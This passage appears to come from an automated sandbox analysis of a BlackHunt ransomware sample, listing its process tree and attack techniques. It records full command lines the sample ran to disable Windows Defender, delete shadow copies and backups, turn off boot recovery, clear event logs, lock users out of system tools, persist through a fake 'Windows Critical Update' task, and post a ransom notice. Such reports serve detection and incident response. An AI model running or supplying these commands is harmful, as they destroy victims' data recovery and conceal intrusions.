1128 cmd.exe 214 PID 4408 wrote to memory of 3880 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 213 PID 4408 wrote to memory of 3880 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 213 PID 2960 wrote to memory of 4964 2960 cmd.exe 212 PID 2960 wrote to memory of 4964 2960 cmd.exe 212 PID 3484 wrote to memory of 1424 3484 cmd.exe 106 PID 3484 wrote to memory of 1424 3484 cmd.exe 106 PID 4408 wrote to memory of 4828 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 211 PID 4408 wrote to memory of 4828 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 211 PID 4408 wrote to memory of 2648 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 209 PID 4408 wrote to memory of 2648 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 209 PID 4988 wrote to memory of 2984 4988 cmd.exe 208 PID 4988 wrote to memory of 2984 4988 cmd.exe 208 PID 4408 wrote to memory of 4932 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 207 PID 4408 wrote to memory of 4932 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 207 PID 3880 wrote to memory of 228 3880 cmd.exe 226 PID 3880 wrote to memory of 228 3880 cmd.exe 226 PID 4408 wrote to memory of 3500 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 110 PID 4408 wrote to memory of 3500 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 110 PID 4828 wrote to memory of 2068 4828 cmd.exe 172 PID 4828 wrote to memory of 2068 4828 cmd.exe 172 PID 2648 wrote to memory of 1448 2648 cmd.exe 204 PID 2648 wrote to memory of 1448 2648 cmd.exe 204 PID 4408 wrote to memory of 4892 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 111 PID 4408 wrote to memory of 4892 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 111 PID 4408 wrote to memory of 4308 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 202 PID 4408 wrote to memory of 4308 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 202 PID 3500 wrote to memory of 4956 3500 cmd.exe 201 PID 3500 wrote to memory of 4956 3500 cmd.exe 201 PID 4932 wrote to memory of 1644 4932 cmd.exe 112 PID 4932 wrote to memory of 1644 4932 cmd.exe 112 PID 4408 wrote to memory of 4808 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 199 PID 4408 wrote to memory of 4808 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 199 PID 4408 wrote to memory of 4508 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 197 PID 4408 wrote to memory of 4508 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 197 PID 4408 wrote to memory of 3232 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 196 PID 4408 wrote to memory of 3232 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 196 PID 4892 wrote to memory of 4668 4892 cmd.exe 195 PID 4892 wrote to memory of 4668 4892 cmd.exe 195 PID 4308 wrote to memory of 2388 4308 cmd.exe 169 PID 4308 wrote to memory of 2388 4308 cmd.exe 169 PID 4408 wrote to memory of 2056 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 192 PID 4408 wrote to memory of 2056 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 192 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe"C:\Users\Admin\AppData\Local\Temp\0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1128
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4808
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f4⤵PID:4636
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:3484
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1424
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2268
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:5060
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f4⤵
- Adds Run key to start application
PID:4964
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe" /F2⤵PID:1660
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe" /F3⤵
- Creates scheduled task(s)
PID:964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1880
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1780
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4604
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4704
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:796
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4560
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3268
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:10524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2664
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:5064
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3164
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:3912
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3812
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1812
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3232
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4808
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4308
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2648
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4988
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2960
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4868
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe"2⤵PID:14072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:14000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:13928
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:13896
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:13840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:13704
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:13680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:13624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:13524
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:12176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:10228
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:12312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:12332
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:12352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:10544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:12820
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:12780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:12716
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:9016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:6992
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:12596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:12640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:12668
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:2068
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2736
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:2388
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵
- Interacts with shadow copies
PID:3228
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:1012
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:4076
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:2580
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:4100
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:4448
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1012
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:4960
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1832
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:232
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7532
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:6984
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:964
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:9948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1448
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:228
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:228
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13336
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13584
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:14244
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:6444
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:7564
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:9488
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵PID:5148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 14602⤵
- Program crash
PID:8456
-
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
